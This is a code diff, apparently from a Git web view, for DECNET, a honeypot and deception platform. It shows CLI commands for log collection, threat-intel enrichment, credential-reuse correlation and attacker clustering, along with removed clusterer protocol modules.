||||
log.info("probe daemonizing log_file=%s interval=%d", log_file, interval)
|
||||
_utils._daemonize()
|
||||
asyncio.run(prober_worker(log_file, interval=interval, timeout=timeout))
|
||||
return
|
||||
|
||||
log.info("probe command invoked log_file=%s interval=%d", log_file, interval)
|
||||
console.print(f"[bold cyan]DECNET-PROBER[/] watching {log_file} for attackers (interval: {interval}s)")
|
||||
console.print("[dim]Press Ctrl+C to stop[/]")
|
||||
try:
|
||||
asyncio.run(prober_worker(log_file, interval=interval, timeout=timeout))
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]DECNET-PROBER stopped.[/]")
|
||||
|
||||
@app.command()
|
||||
def collect(
|
||||
log_file: str = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", "-f", help="Path to write RFC 5424 syslog lines and .json records"),
|
||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
||||
) -> None:
|
||||
"""Stream Docker logs from all running decky service containers to a log file."""
|
||||
import asyncio
|
||||
from decnet.collector import log_collector_worker
|
||||
|
||||
if daemon:
|
||||
log.info("collect daemonizing log_file=%s", log_file)
|
||||
_utils._daemonize()
|
||||
|
||||
log.info("collect command invoked log_file=%s", log_file)
|
||||
console.print(f"[bold cyan]Collector starting[/] → {log_file}")
|
||||
asyncio.run(log_collector_worker(log_file))
|
||||
|
||||
@app.command()
|
||||
def mutate(
|
||||
watch: bool = typer.Option(False, "--watch", "-w", help="Run continuously and mutate deckies according to their interval"),
|
||||
decky_name: Optional[str] = typer.Option(None, "--decky", help="Force mutate a specific decky immediately"),
|
||||
force_all: bool = typer.Option(False, "--all", help="Force mutate all deckies immediately"),
|
||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
||||
) -> None:
|
||||
"""Manually trigger or continuously watch for decky mutation."""
|
||||
import asyncio
|
||||
from decnet.mutator import mutate_decky, mutate_all, run_watch_loop
|
||||
from decnet.web.dependencies import repo
|
||||
|
||||
if daemon:
|
||||
log.info("mutate daemonizing watch=%s", watch)
|
||||
_utils._daemonize()
|
||||
|
||||
async def _run() -> None:
|
||||
await repo.initialize()
|
||||
if watch:
|
||||
await run_watch_loop(repo)
|
||||
elif decky_name:
|
||||
await mutate_decky(decky_name, repo)
|
||||
elif force_all:
|
||||
await mutate_all(force=True, repo=repo)
|
||||
else:
|
||||
await mutate_all(force=False, repo=repo)
|
||||
|
||||
asyncio.run(_run())
|
||||
|
||||
@app.command(name="enrich")
|
||||
def enrich(
|
||||
poll_interval_secs: float = typer.Option(
|
||||
60.0, "--poll-interval", "-i",
|
||||
help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
|
||||
),
|
||||
ttl_hours: int = typer.Option(
|
||||
24, "--ttl-hours",
|
||||
help="Cache lifetime per attacker IP — re-firings inside the window short-circuit before any HTTP egress",
|
||||
),
|
||||
daemon: bool = typer.Option(
|
||||
False, "--daemon", "-d",
|
||||
help="Detach to background as a daemon process",
|
||||
),
|
||||
) -> None:
|
||||
"""Threat-intel enrichment worker — fan out per attacker IP across
|
||||
configured providers (GreyNoise, AbuseIPDB, abuse.ch Feodo Tracker
|
||||
+ ThreatFox), cache the verdict in ``attacker_intel``, and publish
|
||||
``attacker.intel.enriched`` for SIEM-bound webhook consumers.
|
||||
"""
|
||||
import asyncio
|
||||
from decnet.intel.worker import run_intel_loop
|
||||
from decnet.web.dependencies import repo
|
||||
|
||||
if daemon:
|
||||
log.info(
|
||||
"enrich daemonizing poll=%s ttl_hours=%d",
|
||||
poll_interval_secs, ttl_hours,
|
||||
)
|
||||
_utils._daemonize()
|
||||
|
||||
log.info(
|
||||
"enrich command invoked poll=%s ttl_hours=%d",
|
||||
poll_interval_secs, ttl_hours,
|
||||
)
|
||||
console.print(
|
||||
f"[bold cyan]Intel enrichment starting[/] "
|
||||
f"poll={poll_interval_secs}s ttl={ttl_hours}h"
|
||||
)
|
||||
console.print("[dim]Press Ctrl+C to stop[/]")
|
||||
|
||||
async def _run() -> None:
|
||||
await repo.initialize()
|
||||
await run_intel_loop(
|
||||
repo,
|
||||
poll_interval_secs=poll_interval_secs,
|
||||
ttl_hours=ttl_hours,
|
||||
)
|
||||
|
||||
try:
|
||||
asyncio.run(_run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Intel enrichment stopped.[/]")
|
||||
|
||||
@app.command(name="reuse-correlate")
|
||||
def reuse_correlate(
|
||||
min_targets: int = typer.Option(
|
||||
2, "--min-targets", "-m",
|
||||
help="Minimum distinct (decky, service) targets a secret must hit before a CredentialReuse row is persisted",
|
||||
),
|
||||
poll_interval_secs: float = typer.Option(
|
||||
60.0, "--poll-interval", "-i",
|
||||
help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
|
||||
),
|
||||
daemon: bool = typer.Option(
|
||||
False, "--daemon", "-d",
|
||||
help="Detach to background as a daemon process",
|
||||
),
|
||||
) -> None:
|
||||
"""Long-running credential-reuse correlator.
|
||||
|
||||
Watches the bus for ``credential.captured`` and ``attacker.observed``
|
||||
events, re-runs the reuse pass on each wake, and publishes
|
||||
``credential.reuse.detected`` for every new or grown
|
||||
``CredentialReuse`` row.
|
||||
"""
|
||||
import asyncio
|
||||
from decnet.correlation.reuse_worker import run_reuse_loop
|
||||
from decnet.web.dependencies import repo
|
||||
|
||||
if daemon:
|
||||
log.info(
|
||||
"reuse-correlate daemonizing min_targets=%d poll=%s",
|
||||
min_targets, poll_interval_secs,
|
||||
)
|
||||
_utils._daemonize()
|
||||
|
||||
log.info(
|
||||
"reuse-correlate command invoked min_targets=%d poll=%s",
|
||||
min_targets, poll_interval_secs,
|
||||
)
|
||||
console.print(
|
||||
f"[bold cyan]Reuse correlator starting[/] "
|
||||
f"min_targets={min_targets} poll={poll_interval_secs}s"
|
||||
)
|
||||
console.print("[dim]Press Ctrl+C to stop[/]")
|
||||
|
||||
async def _run() -> None:
|
||||
await repo.initialize()
|
||||
await run_reuse_loop(
|
||||
repo,
|
||||
poll_interval_secs=poll_interval_secs,
|
||||
min_targets=min_targets,
|
||||
)
|
||||
|
||||
try:
|
||||
asyncio.run(_run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Reuse correlator stopped.[/]")
|
||||
|
||||
@app.command(name="clusterer")
|
||||
def clusterer(
|
||||
poll_interval_secs: float = typer.Option(
|
||||
60.0, "--poll-interval", "-i",
|
||||
help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
|
||||
),
|
||||
daemon: bool = typer.Option(
|
||||
False, "--daemon", "-d",
|
||||
help="Detach to background as a daemon process",
|
||||
),
|
||||
) -> None:
|
||||
"""Identity-resolution clusterer.
|
||||
|
||||
Bus-woken on ``attacker.observed`` and ``attacker.scored``;
|
||||
builds a similarity graph over observations, runs
|
||||
connected-components, writes ``attacker_identities`` rows, and
|
||||
publishes ``identity.formed`` / ``identity.observation.linked``
|
||||
/ ``identity.merged`` / ``identity.unmerged``.
|
||||
"""
|
||||
import asyncio
|
||||
from decnet.cli.gating import _require_master_mode
|
||||
from decnet.clustering.worker import run_clusterer_loop
|
||||
from decnet.web.dependencies import repo
|
||||
|
||||
_require_master_mode("clusterer")
|
||||
|
||||
if daemon:
|
||||
log.info("clusterer daemonizing poll=%s", poll_interval_secs)
|
||||
_utils._daemonize()
|
||||
|
||||
log.info("clusterer command invoked poll=%s", poll_interval_secs)
|
||||
console.print(
|
||||
f"[bold cyan]Identity clusterer starting[/] "
|
||||
f"poll={poll_interval_secs}s"
|
||||
)
|
||||
console.print("[dim]Press Ctrl+C to stop[/]")
|
||||
|
||||
async def _run() -> None:
|
||||
await repo.initialize()
|
||||
await run_clusterer_loop(
|
||||
repo, poll_interval_secs=poll_interval_secs,
|
||||
)
|
||||
|
||||
try:
|
||||
asyncio.run(_run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Identity clusterer stopped.[/]")
|
||||
|
||||
@app.command(name="campaign-clusterer")
|
||||
def campaign_clusterer(
|
||||
poll_interval_secs: float = typer.Option(
|
||||
60.0, "--poll-interval", "-i",
|
||||
help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
|
||||
),
|
||||
daemon: bool = typer.Option(
|
||||
False, "--daemon", "-d",
|
||||
help="Detach to background as a daemon process",
|
||||
),
|
||||
) -> None:
|
||||
"""Campaign clusterer — groups identities into operations.
|
||||
|
||||
Bus-woken on ``identity.>`` (any identity-layer change is
|
||||
potential input); reads ``AttackerIdentity`` rows, runs
|
||||
connected-components over the campaign-level similarity graph
|
||||
(phase-handoff / shared-infra / temporal-overlap / cohort),
|
||||
writes ``campaigns`` rows + sets ``attacker_identities.campaign_id``,
|
||||
and publishes ``campaign.formed`` / ``campaign.identity.assigned``
|
||||
/ ``campaign.merged`` / ``campaign.unmerged`` plus the cross-family
|
||||
``identity.campaign.assigned`` so identity-side subscribers see
|
||||
the badge update.
|
||||
"""
|
||||
import asyncio
|
||||
from decnet.cli.gating import _require_master_mode
|
||||
from decnet.clustering.campaign.worker import (
|
||||
run_campaign_clusterer_loop,
|
||||
)
|
||||
from decnet.web.dependencies import repo
|
||||
|
||||
_require_master_mode("campaign-clusterer")
|
||||
|
||||
if daemon:
|
||||
log.info("campaign-clusterer daemonizing poll=%s", poll_interval_secs)
|
||||
_utils._daemonize()
|
||||
|
||||
log.info(
|
||||
"campaign-clusterer command invoked poll=%s", poll_interval_secs,
|
||||
)
|
||||
console.print(
|
||||
f"[bold cyan]Campaign clusterer starting[/] "
|
||||
f"poll={poll_interval_secs}s"
|
||||
)
|
||||
console.print("[dim]Press Ctrl+C to stop[/]")
|
||||
|
||||
async def _run() -> None:
|
||||
await repo.initialize()
|
||||
await run_campaign_clusterer_loop(
|
||||
repo, poll_interval_secs=poll_interval_secs,
|
||||
)
|
||||
|
||||
try:
|
||||
asyncio.run(_run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Campaign clusterer stopped.[/]")
|
||||
@@ -1 +0,0 @@
|
||||
"""Campaign clustering — see development/CAMPAIGN_CLUSTERING.md."""
|
||||
@@ -1,83 +0,0 @@
|
||||
"""Identity-resolution clusterer protocol.
|
||||
|
||||
Each concrete clusterer (``decnet.clustering.impl.connected_components``,
|
||||
and any future variant) implements this. Callers must obtain the active
|
||||
clusterer via :func:`decnet.clustering.factory.get_clusterer` — never
|
||||
instantiate a concrete class directly.
|
||||
|
||||
The clusterer mirrors the provider-subpackage convention used by
|
||||
:mod:`decnet.bus` and :mod:`decnet.web.db`: ``base.py`` defines the
|
||||
protocol, ``factory.py`` dispatches on ``DECNET_CLUSTERER_TYPE``, and
|
||||
``impl/`` holds concrete implementations.
|
||||
|
||||
Distinct from the ``tests/factories/campaign_factory.py`` namespace —
|
||||
that's the synthetic-data DSL used by the fixture suite. The clusterer
|
||||
here is the production worker that the fixture suite *gates*.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from abc import ABC, abstractmethod
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Any
|
||||
|
||||
from decnet.web.db.repository import BaseRepository
|
||||
|
||||
|
||||
@dataclass
|
||||
class ClusterResult:
|
||||
"""Side-effects produced by a single clusterer ``tick``.
|
||||
|
||||
The worker shell consumes these to publish on the bus
|
||||
(``identity.formed`` / ``identity.observation.linked`` /
|
||||
``identity.merged`` / ``identity.unmerged``). The clusterer itself
|
||||
has already committed any DB writes by the time it returns this —
|
||||
losing a publish is at most a few seconds of UI latency.
|
||||
"""
|
||||
|
||||
identities_formed: list[dict[str, Any]] = field(default_factory=list)
|
||||
"""One dict per newly created identity. Shape:
|
||||
``{"identity_uuid": str, "observation_uuids": [str, ...]}``."""
|
||||
|
||||
observations_linked: list[dict[str, Any]] = field(default_factory=list)
|
||||
"""One dict per observation attached to an existing identity. Shape:
|
||||
``{"identity_uuid": str, "observation_uuid": str}``."""
|
||||
|
||||
identities_merged: list[dict[str, Any]] = field(default_factory=list)
|
||||
"""One dict per merge. Shape: ``{"winner_uuid": str,
|
||||
"loser_uuid": str}``."""
|
||||
|
||||
identities_unmerged: list[dict[str, Any]] = field(default_factory=list)
|
||||
"""One dict per revoked merge (contradicting evidence re-split a
|
||||
previously-merged pair). Shape:
|
||||
``{"resurrected_uuid": str, "former_winner_uuid": str}``.
|
||||
|
||||
Reserved for the revocable-merge work; the skeleton clusterer never
|
||||
produces these. Subscribers on ``identity.>`` should still handle
|
||||
them from day one — see ``identity.unmerged`` in
|
||||
:mod:`decnet.bus.topics`.
|
||||
"""
|
||||
|
||||
|
||||
class Clusterer(ABC):
|
||||
"""Abstract identity-resolution clusterer.
|
||||
|
||||
Single-method contract: ``tick`` reads pending observations from the
|
||||
repo, runs a clustering pass, commits ``attacker_identities`` rows +
|
||||
sets ``attackers.identity_id``, and returns a :class:`ClusterResult`
|
||||
summarising the side-effects so the worker shell can publish.
|
||||
|
||||
Implementations MUST NOT raise from ``tick``: a single bad pass
|
||||
cannot be allowed to crash the worker. Internal failures should be
|
||||
logged and the method should return an empty :class:`ClusterResult`.
|
||||
"""
|
||||
|
||||
#: Short tag — surfaces in logs and in
|
||||
#: ``DECNET_CLUSTERER_TYPE`` for factory dispatch.
|
||||
name: str
|
||||
|
||||
@abstractmethod
|
||||
async def tick(self, repo: BaseRepository) -> ClusterResult:
|
||||
"""Run a single clustering pass. See class docstring."""
|
||||
|
||||
|
||||
__all__ = ["Clusterer", "ClusterResult"]
|
||||
@@ -1,5 +0,0 @@
|
||||
"""Campaign clusterer — groups resolved identities into operations.
|
||||
|
||||
The layer above identity resolution. See
|
||||
``development/CAMPAIGN_CLUSTERING.md`` for the signal taxonomy.
|
||||
"""
|
||||
@@ -1,66 +0,0 @@
|
||||
"""Campaign clusterer protocol — layer above identity resolution.
|
||||
|
||||
Mirrors :mod:`decnet.clustering.base` for the layer above. Each concrete
|
||||
campaign clusterer implements :class:`CampaignClusterer`; callers obtain
|
||||
the active instance via
|
||||
:func:`decnet.clustering.campaign.factory.get_campaign_clusterer`.
|
||||
|
||||
The result shape parallels :class:`ClusterResult` but speaks campaign
|
||||
vocabulary: campaigns formed, identities assigned, campaigns merged,
|
||||
campaigns unmerged.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from abc import ABC, abstractmethod
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Any
|
||||
|
||||
from decnet.web.db.repository import BaseRepository
|
||||
|
||||
|
||||
@dataclass
|
||||
class CampaignClusterResult:
|
||||
"""Side-effects produced by a single campaign-clusterer ``tick``.
|
||||
|
||||
Consumed by the worker shell to publish on the bus
|
||||
(``campaign.formed`` / ``campaign.identity.assigned`` /
|
||||
``campaign.merged`` / ``campaign.unmerged`` plus the cross-family
|
||||
``identity.campaign.assigned``). DB writes are already committed
|
||||
by the time this returns.
|
||||
"""
|
||||
|
||||
campaigns_formed: list[dict[str, Any]] = field(default_factory=list)
|
||||
"""``{"campaign_uuid": str, "identity_uuids": [str, ...]}``."""
|
||||
|
||||
identities_assigned: list[dict[str, Any]] = field(default_factory=list)
|
||||
"""``{"campaign_uuid": str, "identity_uuid": str,
|
||||
"prior_campaign_uuid": Optional[str]}``."""
|
||||
|
||||
campaigns_merged: list[dict[str, Any]] = field(default_factory=list)
|
||||
"""``{"winner_uuid": str, "loser_uuid": str}``."""
|
||||
|
||||
campaigns_unmerged: list[dict[str, Any]] = field(default_factory=list)
|
||||
"""``{"resurrected_uuid": str, "former_winner_uuid": str}``."""
|
||||
|
||||
|
||||
class CampaignClusterer(ABC):
|
||||
"""Abstract campaign clusterer.
|
||||
|
||||
Single-method contract mirroring :class:`Clusterer`: ``tick`` reads
|
||||
identities from the repo, projects them to a campaign-level feature
|
||||
shape, runs a clustering pass, commits ``campaigns`` rows + sets
|
||||
``attacker_identities.campaign_id``, and returns a
|
||||
:class:`CampaignClusterResult` summarising side-effects.
|
||||
|
||||
Implementations MUST NOT raise from ``tick``: a single bad pass
|
||||
cannot be allowed to crash the worker.
|
||||
"""
|
||||
|
||||
name: str
|
||||
|
||||
@abstractmethod
|
||||
async def tick(self, repo: BaseRepository) -> CampaignClusterResult:
|
||||
"""Run a single campaign clustering pass."""
|
||||
|
||||
|
||||
__all__ = ["CampaignClusterer", "CampaignClusterResult"]
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user